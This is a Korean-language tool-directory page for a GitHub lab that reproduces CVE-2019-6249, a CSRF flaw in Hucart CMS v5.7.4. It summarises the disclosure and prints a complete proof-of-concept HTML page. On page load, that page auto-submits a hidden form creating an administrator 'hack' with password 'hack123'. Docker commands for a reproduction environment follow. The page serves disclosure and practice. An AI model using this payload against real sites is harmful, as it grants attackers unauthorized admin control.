Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2019-6249_Hucart-cms — CVE-2019-6249 Hucart cms 재현 환경 | Kitploit
도구/GitHubGitHub/alphabugx/cve-2019-6249_hucart-cms
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationLabs & Practice
GitHubalphabugx/cve-2019-6249_hucart-cms

CVE-2019-6249_Hucart-cms

CVE-2019-6249 Hucart cms 재현 환경

저장소 보기
124년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2019-6249_Hucart cms

1. 취약점 요약

취약점 이름: Hucart cms v5.7.4 CSRF 취약점 (관리자 계정 임의 추가 가능) 보고일: 2019-01-13 취약점 발견자: AllenChen ([email protected]) 제품 홈페이지: http://www.hucart.com/ 소프트웨어 링크: http://www.hucart.com/ 버전: v5.7.4 CVE 번호: CVE-2019-6249

2. 취약점 개요

Hucart cms v5.7.4 버전에 CSRF 취약점이 존재합니다. 관리자가 로그인한 후 아래 CSRF 테스트 페이지에 접속하면 'hack'이라는 이름의 관리자 계정이 추가됩니다.

3. 익스플로잇 코드

익스플로잇 코드는 다음과 같습니다: 비밀번호가 'hack123'인 'hack'이라는 이름의 관리자 계정을 추가합니다.

root@kitploit:~
<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='adm_user' value='hack' />";
fields += "<input type='hidden' name='adm_email' value='[email protected]' />";  
fields += "<input type='hidden' name='adm_mobile' value='13888888888' />";  
fields += "<input type='hidden' name='adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='re_adm_pwd' value='hack123' />";  
fields += "<input type='hidden' name='adm_enabled' value='1' />";  
fields += "<input type='hidden' name='act_type' value='add' />";  
fields += "<input type='hidden' name='adm_id' value='' />";  

var url = "http://localhost/hucart_cn/adminsys/index.php?load=admins&act=edit_info&act_type=add";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>

4. 참고 정보

  • CVE 중국어 신청 사이트: http://www.iwantacve.cn/index.php/archives/109/
  • CVE 공식: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6249
  • exploit-db: https://www.exploit-db.com/exploits/46149

5. 환경 재현 (Docker)

Docker 환경에서 다음 명령을 실행하세요

root@kitploit:~
docker built -t hucart -f Dockerfile .
docker run -d -p 80:80 hucart

원본 이메일: [email protected]

도구 다운로드